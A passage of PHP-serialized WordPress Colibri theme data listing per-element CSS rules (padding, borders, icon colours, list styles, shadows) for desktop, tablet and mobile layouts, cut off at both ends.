padding-left: 15%;\n transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:254:\"#colibri .style-391 {\n text-align: center;\n padding-top: 10%;\n padding-right: 10%;\n padding-bottom: 10%;\n padding-left: 10%;\n transform: translateX(0%) translateY(0%);\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n}\n\";}i:392;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-392 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:394;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-394 ol {\n list-style-type: decimal;\n}\n#colibri .style-394 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:395;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:396;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-396 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:397;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:398;a:3:{s:7:\"desktop\";s:165:\"#colibri .style-398 {\n text-align: left;\n height: auto;\n min-height: unset;\n padding-top: 5%;\n padding-right: 12%;\n padding-bottom: 5%;\n padding-left: 17%;\n}\n\";s:6:\"tablet\";s:66:\"#colibri .style-398 {\n padding-right: 5%;\n padding-left: 10%;\n}\n\";s:6:\"mobile\";s:136:\"#colibri .style-398 {\n text-align: center;\n padding-top: 15px;\n padding-right: 15px;\n padding-bottom: 15px;\n padding-left: 15px;\n}\n\";}i:399;a:3:{s:7:\"desktop\";s:347:\"#colibri .style-399 p,#colibri .style-399 h1,#colibri .style-399 h2,#colibri .style-399 h3,#colibri .style-399 h4,#colibri .style-399 h5,#colibri .style-399 h6 {\n text-transform: uppercase;\n}\n#colibri .style-399 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:400;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-400 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:401;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-401 ul {\n list-style-type: disc;\n}\n#colibri .style-401 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:406;a:3:{s:7:\"desktop\";s:419:\"#colibri .style-406 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-position: center center;\n background-size: cover;\n background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-2.webp\");\n background-attachment: scroll;\n background-repeat: no-repeat;\n box-shadow: 0px 10px 20px 0px rgba(0, 0, 0, 0.2) ;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:45:\"#colibri .style-406 {\n min-height: 400px;\n}\n\";}i:407;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:408;a:3:{s:7:\"desktop\";s:61:\"#colibri .style-408 {\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:409;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:410;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-410 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:412;a:3:{s:7:\"desktop\";s:153:\"#colibri .style-412 {\n text-align: center;\n}\n#colibri .style-412 ol {\n list-style-type: decimal;\n}\n#colibri .style-412 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:413;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:417;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-417 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:418;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:419;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-419 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:420;a:3:{s:7:\"desktop\";s:259:\"#colibri .style-420 {\n text-align: left;\n font-style: normal;\n font-size: 16px;\n}\n#colibri .style-420 p {\n font-style: normal;\n font-size: 16px;\n}\n#colibri .style-420 ul {\n list-style-type: disc;\n}\n#colibri .style-420 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:421;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-421 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:422;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:423;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-423 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:440;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-440 {\n height: auto;\n min-height: unset;\n background-color: #f6f8fa;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:441;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:442;a:3:{s:7:\"desktop\";s:264:\".style-442 > .h-y-container > *:not(:last-child) {\n margin-bottom: 0px;\n}\n#colibri .style-442 {\n text-align: center;\n height: auto;\n min-height: unset;\n box-shadow: 0px 1px 3px 1px rgba(0, 0, 0, 0.1) ;\n background-color: #f6f8fa;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:443;a:3:{s:7:\"desktop\";s:1113:\"#colibri .style-443-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-443-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-443-caption {\n margin-top: 10px;\n}\n#colibri .style-443-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:444;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:445;a:3:{s:7:\"desktop\";s:159:\".style-445 > .h-y-container > *:not(:last-child) {\n margin-bottom: 15px;\n}\n#colibri .style-445 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:446;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-446 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:447;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-447 ul {\n list-style-type: disc;\n}\n#colibri .style-447 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:448;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-448 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-448 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-448 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-448 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:449;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-449 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-449 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-449 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-449 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:450;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-450 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-450 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-450 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-450 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:451;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-451 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-451 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-451 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-451 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:452;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:453;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-453 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:454;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-454 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:510;a:3:{s:7:\"desktop\";s:114:\"#colibri .style-510 {\n height: auto;\n min-height: unset;\n background-color: unset;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:511;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:512;a:3:{s:7:\"desktop\";s:264:\".style-512 > .h-y-container > *:not(:last-child) {\n margin-bottom: 0px;\n}\n#colibri .style-512 {\n text-align: center;\n height: auto;\n min-height: unset;\n box-shadow: 0px 1px 3px 1px rgba(0, 0, 0, 0.1) ;\n background-color: #f6f8fa;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:513;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-513-image {\n opacity: 1;\n}\n#colibri .style-513-caption {\n margin-top: 10px;\n}\n#colibri .style-513-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:514;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:515;a:3:{s:7:\"desktop\";s:159:\".style-515 > .h-y-container > *:not(:last-child) {\n margin-bottom: 15px;\n}\n#colibri .style-515 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:516;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-516 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:517;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-517 ul {\n list-style-type: disc;\n}\n#colibri .style-517 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:518;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-518 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-518 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-518 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-518 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:519;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-519 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-519 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-519 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-519 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:520;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-520 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-520 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-520 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-520 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:521;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-521 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-521 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-521 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-521 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:522;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:523;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-523 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:524;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-524 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:605;a:3:{s:7:\"desktop\";s:61:\"#colibri .style-605 {\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:606;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:607;a:3:{s:7:\"desktop\";s:800:\".style-607 > .h-y-container > *:not(:last-child) {\n margin-bottom: 0px;\n}\n#colibri .style-607 {\n text-align: center;\n height: auto;\n min-height: unset;\n box-shadow: none;\n border-top-width: 1px;\n border-top-color: rgb(224, 225, 225);\n border-top-style: solid;\n border-right-width: 1px;\n border-right-color: rgb(224, 225, 225);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(224, 225, 225);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-color: rgb(224, 225, 225);\n border-left-style: solid;\n background-color: #f6f8fa;\n background-image: none;\n}\n#colibri .style-607:hover {\n box-shadow: 0px 1px 20px 2px rgba(0, 0, 0, 0.1) ;\n transition-duration: 0.5s;\n transform: translateY(-2px);\n transform-origin: center center 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:608;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-608-image {\n opacity: 1;\n}\n#colibri .style-608-caption {\n margin-top: 10px;\n}\n#colibri .style-608-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:609;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:610;a:3:{s:7:\"desktop\";s:159:\".style-610 > .h-y-container > *:not(:last-child) {\n margin-bottom: 15px;\n}\n#colibri .style-610 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:611;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-611 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:612;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-612 ul {\n list-style-type: disc;\n}\n#colibri .style-612 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:613;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-613 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-613 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-613 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-613 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:614;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-614 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n#colibri .style-614 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-614 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-614 .icon-container:hover {\n fill: #303e7a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:615;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-615 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n#colibri .style-615 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-615 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-615 .icon-container:hover {\n fill: #303e7a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:616;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-616 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n#colibri .style-616 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-616 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-616 .icon-container:hover {\n fill: #303e7a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:617;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:618;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-618 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:619;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-619 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:620;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-620 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:623;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:624;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-624 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:625;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-625 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:626;a:3:{s:7:\"desktop\";s:114:\"#colibri .style-626 {\n height: auto;\n min-height: unset;\n background-color: unset;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:627;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:628;a:3:{s:7:\"desktop\";s:650:\".style-628 > .h-y-container > *:not(:last-child) {\n margin-bottom: 0px;\n}\n#colibri .style-628 {\n text-align: center;\n height: auto;\n min-height: unset;\n box-shadow: 0px 1px 3px 1px rgba(0, 0, 0, 0.1) ;\n background-color: #f6f8fa;\n background-image: none;\n border-top-width: 1px;\n border-top-color: rgb(224, 225, 225);\n border-top-style: solid;\n border-right-width: 1px;\n border-right-color: rgb(224, 225, 225);\n border-right-style: solid;\n border-bottom-width: 1px;\n border-bottom-color: rgb(224, 225, 225);\n border-bottom-style: solid;\n border-left-width: 1px;\n border-left-color: rgb(224, 225, 225);\n border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:629;a:3:{s:7:\"desktop\";s:649:\"#colibri .style-629-image {\n opacity: 1;\n}\n#colibri .style-629-caption {\n margin-top: 10px;\n}\n#colibri .style-629-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:630;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:631;a:3:{s:7:\"desktop\";s:159:\".style-631 > .h-y-container > *:not(:last-child) {\n margin-bottom: 15px;\n}\n#colibri .style-631 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:632;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-632 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:633;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-633 ul {\n list-style-type: disc;\n}\n#colibri .style-633 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:634;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-634 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-634 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-634 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-634 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:635;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-635 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-635 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-635 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-635 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:636;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-636 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-636 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-636 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-636 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:637;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-637 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n#colibri .style-637 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-637 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-637 .icon-container:hover {\n fill: #303e7a;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:638;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:639;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-639 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:640;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-640 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:641;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-641 ol {\n list-style-type: decimal;\n}\n#colibri .style-641 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:642;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:656;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-656 {\n height: auto;\n min-height: 